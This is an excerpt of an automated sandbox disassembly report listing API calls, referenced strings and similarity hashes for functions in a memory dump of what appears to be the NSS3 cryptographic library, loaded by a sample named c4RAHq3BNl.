Part of subcall function 6C840BE0: TlsGetValue.KERNEL32(6C838D2D,?,00000000,?), ref: 6C840C15

memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C7E0FDB
PR_CallOnce.NSS3(6C942AA4,6C8412D0), ref: 6C7E0FEF
PL_FreeArenaPool.NSS3(?), ref: 6C7E1001
PL_FinishArenaPool.NSS3(?), ref: 6C7E1009

Strings

security, xrefs: 6C7E0F5C

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
String ID: security
API String ID: 2061345354-3315324353
Opcode ID: 4b4a4e79ab7f69ad8321c49b680c04c8e6b7ec8aec8c44b9aeea0d7565f75ee4
Instruction ID: e0bb2d536151ea179555cf464c9a354edcfb108c45538e8ee9c69eb0d008c1a7
Opcode Fuzzy Hash: 4b4a4e79ab7f69ad8321c49b680c04c8e6b7ec8aec8c44b9aeea0d7565f75ee4
Instruction Fuzzy Hash: D32106B1904208ABE710DF29DE41AAB77B4EF8565CF048928FC1897701FB31D556CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6C7E6DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6C7E7D8F,6C7E7D8F,?,?), ref: 6C7E6DC8

Part of subcall function 6C83FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C83FE08
Part of subcall function 6C83FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C83FE1D
Part of subcall function 6C83FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C83FE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C7E7D8F,?,?), ref: 6C7E6DD5

Part of subcall function 6C8410C0: TlsGetValue.KERNEL32(?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C8410F3
Part of subcall function 6C8410C0: EnterCriticalSection.KERNEL32(?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C84110C
Part of subcall function 6C8410C0: PL_ArenaAllocate.NSS3(?,?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C841141
Part of subcall function 6C8410C0: PR_Unlock.NSS3(?,?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C841182
Part of subcall function 6C8410C0: TlsGetValue.KERNEL32(?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C84119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C908FA0,00000000,?,?,?,?,6C7E7D8F,?,?), ref: 6C7E6DF7

Part of subcall function 6C83B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9118D0,?), ref: 6C83B095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C7E6E35

Part of subcall function 6C83FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C83FE29
Part of subcall function 6C83FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C83FE3D
Part of subcall function 6C83FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C83FE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C7E6E4C

Part of subcall function 6C8410C0: PL_ArenaAllocate.NSS3(?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C84116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C908FE0,00000000), ref: 6C7E6E82

Part of subcall function 6C7E6AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C7EB21D,00000000,00000000,6C7EB219,?,6C7E6BFB,00000000,?,00000000,00000000,?,?,?,6C7EB21D), ref: 6C7E6B01
Part of subcall function 6C7E6AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C7E6B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C7E6F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C7E6F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C908FE0,00000000), ref: 6C7E6F6B
PR_SetError.NSS3(FFFFE005,00000000,6C7E7D8F,?,?), ref: 6C7E6FE1

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: 95785e0a31708df43cc878a2dc1e111cbd29e068b29ec5fd98005e4935fe02af
Instruction ID: ec882686c5572190086661ba0d2376ed659ec57ae3f80b1e8d7353e6bd08a842
Opcode Fuzzy Hash: 95785e0a31708df43cc878a2dc1e111cbd29e068b29ec5fd98005e4935fe02af
Instruction Fuzzy Hash: A5718172E1064A9BDB00CF55CE40BAA77A4BF98308F155639E908D7B11F770EAA4CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6C820FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C821057
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C821085
PK11_GetAllTokens.NSS3 ref: 6C8210B1
free.MOZGLUE(?), ref: 6C821107
PR_SetError.NSS3(00000000,00000000), ref: 6C821172
free.MOZGLUE(?), ref: 6C821182
free.MOZGLUE(?), ref: 6C8211A6
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C8211C5

Part of subcall function 6C8252C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C7FEAC5,00000001), ref: 6C8252DF
Part of subcall function 6C8252C0: EnterCriticalSection.KERNEL32(?), ref: 6C8252F3
Part of subcall function 6C8252C0: PR_Unlock.NSS3(?), ref: 6C825358

PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C8211D3
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C8211F3

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
String ID:
API String ID: 1549229083-0
Opcode ID: bf586816e3e9c9631ee81804a9d983a0c03da84e30dad0c9e2e52459aaf54b75
Instruction ID: 527530536542c1f4c69aefc779daa4e1dd00cc23634a307c90ddea58e620a490
Opcode Fuzzy Hash: bf586816e3e9c9631ee81804a9d983a0c03da84e30dad0c9e2e52459aaf54b75
Instruction Fuzzy Hash: 5D61B6B0E043459BEB20DF68DA45B9EB7B5AF04348F244528EC19AB741E736ED84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C82ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C80CDBB,?,6C80D079,00000000,00000001), ref: 6C82AE10
EnterCriticalSection.KERNEL32(?,?,6C80CDBB,?,6C80D079,00000000,00000001), ref: 6C82AE24
PR_Unlock.NSS3(?,?,?,?,?,?,6C80D079,00000000,00000001), ref: 6C82AE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C80CDBB,?,6C80D079,00000000,00000001), ref: 6C82AE6F
free.MOZGLUE(85145F8B,?,?,?,?,6C80CDBB,?,6C80D079,00000000,00000001), ref: 6C82AE7F
TlsGetValue.KERNEL32(?,6C80CDBB,?,6C80D079,00000000,00000001), ref: 6C82AEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C80CDBB,?,6C80D079,00000000,00000001), ref: 6C82AEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C80CDBB,?,6C80D079,00000000,00000001), ref: 6C82AEF1
free.MOZGLUE(6C80CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C80CDBB,?), ref: 6C82AF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C80CDBB,?,6C80D079,00000000,00000001), ref: 6C82AF30

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: ba9f069a4582d4b6aa2f2ff5683724b4116bd7e1653f4789f29f0b92d9fa5edf
Instruction ID: 22b3437782db4ccd520acc9f85152a220cccb2117988dbdccda4055cca273b0d
Opcode Fuzzy Hash: ba9f069a4582d4b6aa2f2ff5683724b4116bd7e1653f4789f29f0b92d9fa5edf
Instruction Fuzzy Hash: 1551C2B5A00A02EFDB20DF29D988B95B7B4FF04318F144A65D81897E11E739F8A4CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6C804CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6C80AB7F,?,00000000,?), ref: 6C804CB4
EnterCriticalSection.KERNEL32(0000001C,?,6C80AB7F,?,00000000,?), ref: 6C804CC8
TlsGetValue.KERNEL32(?,6C80AB7F,?,00000000,?), ref: 6C804CE0
EnterCriticalSection.KERNEL32(?,?,6C80AB7F,?,00000000,?), ref: 6C804CF4
PL_HashTableLookup.NSS3(?,?,?,6C80AB7F,?,00000000,?), ref: 6C804D03
PR_Unlock.NSS3(?,00000000,?), ref: 6C804D10

Part of subcall function 6C88DD70: TlsGetValue.KERNEL32 ref: 6C88DD8C
Part of subcall function 6C88DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C88DDB4

PR_Now.NSS3(?,00000000,?), ref: 6C804D26

Part of subcall function 6C8A9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C8F0A27), ref: 6C8A9DC6
Part of subcall function 6C8A9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C8F0A27), ref: 6C8A9DD1
Part of subcall function 6C8A9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C8A9DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6C804D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C804DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C804E02

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: 70e1f68b751a0f0dc207a87a86b64dc7a67f768f7d9213d196e6a93941537fa0
Instruction ID: 3c94033293fc023c3cba8953f396db04e7391ceb1a8fe96e7f353f636ec20661
Opcode Fuzzy Hash: 70e1f68b751a0f0dc207a87a86b64dc7a67f768f7d9213d196e6a93941537fa0
Instruction Fuzzy Hash: 98410BB6A001059BDB205F38EE8896677B8FFA521DF054571EC1887B11FB31D964CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6C7E2E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C7E2CDA,?,00000000), ref: 6C7E2E1E

Part of subcall function 6C83FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C7E9003,?), ref: 6C83FD91
Part of subcall function 6C83FD80: PORT_Alloc_Util.NSS3(A4686C84,?), ref: 6C83FDA2
Part of subcall function 6C83FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C84,?,?), ref: 6C83FDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C7E2E33

Part of subcall function 6C83FD80: free.MOZGLUE(00000000,?,?), ref: 6C83FDD1

TlsGetValue.KERNEL32 ref: 6C7E2E4E
EnterCriticalSection.KERNEL32(?), ref: 6C7E2E5E
PL_HashTableLookup.NSS3(?), ref: 6C7E2E71
PL_HashTableRemove.NSS3(?), ref: 6C7E2E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6C7E2E96
PR_Unlock.NSS3 ref: 6C7E2EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7E2EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7E2EC5

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: 9c8f40852e3454036cefd0a8071803fce2641af40097e8915ccc933a9a1e433c
Instruction ID: 1718f0307ed5ed8f1b2ae75ba7e08aded7faf7e153402286f9c2cd766780c4e4
Opcode Fuzzy Hash: 9c8f40852e3454036cefd0a8071803fce2641af40097e8915ccc933a9a1e433c
Instruction Fuzzy Hash: 0A213A72A04111A7DF212B28EE0DA9A3B78EB5635EF154530ED1886721F732D558C2D1

Uniqueness

Uniqueness Score: -1.00%

Function 6C870690 Relevance: 15.1, APIs: 10, Instructions: 57threadCOMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(00000000,?,?,6C870642,?,?,6C87477E,00000000), ref: 6C870695

Part of subcall function 6C8A98D0: calloc.MOZGLUE(00000001,00000084,6C7D0936,00000001,?,6C7D102C), ref: 6C8A98E5

PR_NewLock.NSS3(00000000,?,?,6C870642,?,?,6C87477E,00000000), ref: 6C8706A1

Part of subcall function 6C8A98D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C8A9946
Part of subcall function 6C8A98D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C7616B7,00000000), ref: 6C8A994E
Part of subcall function 6C8A98D0: free.MOZGLUE(00000000), ref: 6C8A995E

PR_GetCurrentThread.NSS3(00000000,?,?,6C870642,?,?,6C87477E,00000000), ref: 6C8706BB
DeleteCriticalSection.KERNEL32(?,00000000,?,?,6C870642,?,?,6C87477E,00000000), ref: 6C8706D1
free.MOZGLUE(?,?,?,6C870642,?,?,6C87477E,00000000), ref: 6C8706D8
PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,?,6C870642,?,?,6C87477E,00000000), ref: 6C8706F4

Part of subcall function 6C88C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C88C2BF

DeleteCriticalSection.KERNEL32(?), ref: 6C87070A
free.MOZGLUE(?), ref: 6C870711
PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C87072D
PR_SetError.NSS3(?,00000000), ref: 6C870738

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Error$CriticalSectionfree$DeleteLock$CountCurrentInitializeLastSpinThreadValuecalloc
String ID:
API String ID: 3345202482-0
Opcode ID: 7fd9000b83a69b1ff47f563b2489a5b2120bc556be390a238bea11442f15c01a
Instruction ID: b51ee52409d052aa92f23d440e2f6cd738260d35af7a5bd241925c95288aef86
Opcode Fuzzy Hash: 7fd9000b83a69b1ff47f563b2489a5b2120bc556be390a238bea11442f15c01a
Instruction Fuzzy Hash: A0115572B09A515BDF30BFA89E08B0E3738AB8222CF210534E909D7F40F736E40587A1

Uniqueness

Uniqueness Score: -1.00%

Function 6C8866A0 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 358COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(00000000), ref: 6C88690A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C886999
PK11_ImportDataKey.NSS3(00000000,0000402A,00000004,0000010C,?,00000000), ref: 6C8869E3

Part of subcall function 6C86F060: PR_SetError.NSS3(FFFFE013,00000000,?,?,?,hrr ech accept confirmation,?,6C8867A0,?,?,?), ref: 6C86F08A

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C886A1F
PK11_FreeSymKey.NSS3(?), ref: 6C886A3F
PK11_FreeSymKey.NSS3(?), ref: 6C886A58

Part of subcall function 6C86EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C86EE85

Part of subcall function 6C86EE50: realloc.MOZGLUE(052D3AB7,?), ref: 6C86EEAE
Part of subcall function 6C86EE50: PORT_Alloc_Util.NSS3(?), ref: 6C86EEC5
Part of subcall function 6C86EE50: htonl.WSOCK32(?), ref: 6C86EEE3
Part of subcall function 6C86EE50: htonl.WSOCK32(00000000,?), ref: 6C86EEED
Part of subcall function 6C86EE50: memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C86EF01

Strings

hrr ech accept confirmation, xrefs: 6C8866C3, 6C886A9B
ech accept confirmation, xrefs: 6C8866BE

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: K11_$FreeUtil$ErrorItem_Zfreehtonl$Alloc_DataImportmemcpyrealloc
String ID: ech accept confirmation$hrr ech accept confirmation
API String ID: 316861715-779126823
Opcode ID: c11cbf1bcbc55492fb998c6ea689392c52276e0753141f3b30462db4b40e2874
Instruction ID: ee9d7c28bf32cf6b79367cf724b3990af289709d61899df6320a9a1110ed45b4
Opcode Fuzzy Hash: c11cbf1bcbc55492fb998c6ea689392c52276e0753141f3b30462db4b40e2874
Instruction Fuzzy Hash: 96B1E4B2A153056BE720DA299E01FAB32A8AF5434CF440D38FD58D6E81F731E61987D2

Uniqueness

Uniqueness Score: -1.00%

Function 6C76CEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C76B999), ref: 6C76CFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C76B999), ref: 6C76D02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C76B999), ref: 6C76D041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C76B999), ref: 6C8B972B

Strings

%s at line %d of [%.10s], xrefs: 6C76CFEC, 6C76D018, 6C76D029, 6C76D03F, 6C8B978B
database corruption, xrefs: 6C76CFE7, 6C76D013, 6C76D028, 6C76D039, 6C76D03E, 6C8B9786
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C76CFDD, 6C76D00E, 6C76D022, 6C76D033, 6C8B9780

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 5c8be212eaac25a0cd4c01a121a5b6ca42de8602237eb7a4ab6eaf01e704f491
Instruction ID: 44340e9f6c074d1c2aeb57088f3b6535886c38937ebd0977bcb0a8fba1fa0ec2
Opcode Fuzzy Hash: 5c8be212eaac25a0cd4c01a121a5b6ca42de8602237eb7a4ab6eaf01e704f491
Instruction Fuzzy Hash: AC615B71A042148BD320CF29C941BA7B7F2EF95318F28456DE849ABF42D376D947C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F2680 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_release_memory.NSS3(PR_Select(),PR_Poll()), ref: 6C8F269F
calloc.MOZGLUE(00000014,00000008), ref: 6C8F26E0
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C8F26F4
PR_Sleep.NSS3(?), ref: 6C8F2710

Part of subcall function 6C8FC2A0: PR_IntervalNow.NSS3 ref: 6C8FC2BE
Part of subcall function 6C8FC2A0: PR_NewCondVar.NSS3 ref: 6C8FC2CC
Part of subcall function 6C8FC2A0: EnterCriticalSection.KERNEL32(?), ref: 6C8FC2E8
Part of subcall function 6C8FC2A0: PR_IntervalNow.NSS3 ref: 6C8FC2F7
Part of subcall function 6C8FC2A0: _PR_MD_UNLOCK.NSS3(?), ref: 6C8FC378
Part of subcall function 6C8FC2A0: DeleteCriticalSection.KERNEL32(?), ref: 6C8FC390
Part of subcall function 6C8FC2A0: free.MOZGLUE(?), ref: 6C8FC397

Part of subcall function 6C8F28A0: realloc.MOZGLUE(?,000000A8), ref: 6C8F28EB
Part of subcall function 6C8F28A0: memset.VCRUNTIME140(-FFFFFAC0,00000000,000000A0), ref: 6C8F290A

PR_SetError.NSS3(FFFFE891,00000000), ref: 6C8F287D
free.MOZGLUE(?), ref: 6C8F288B

Strings

PR_Poll(), xrefs: 6C8F2695
PR_Select(), xrefs: 6C8F269A

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CriticalErrorIntervalSectionfree$CondDeleteEnterSleepcallocmemsetreallocsqlite3_release_memory
String ID: PR_Poll()$PR_Select()
API String ID: 3069664790-3034026096
Opcode ID: ef393385bbaf0a9d80ab6840b6ce0c6834963a508ba07e00d96ee382c1ed8021
Instruction ID: 9a2b04429a53f35ad35eab045375ac5f11fe52ca840a3bef68cbcf4bc7625ab9
Opcode Fuzzy Hash: ef393385bbaf0a9d80ab6840b6ce0c6834963a508ba07e00d96ee382c1ed8021
Instruction Fuzzy Hash: C761E370A016568FDB20DF69CA487AAB7B1FF44344F248A38DD28DB751E738D806CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6C7EAF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

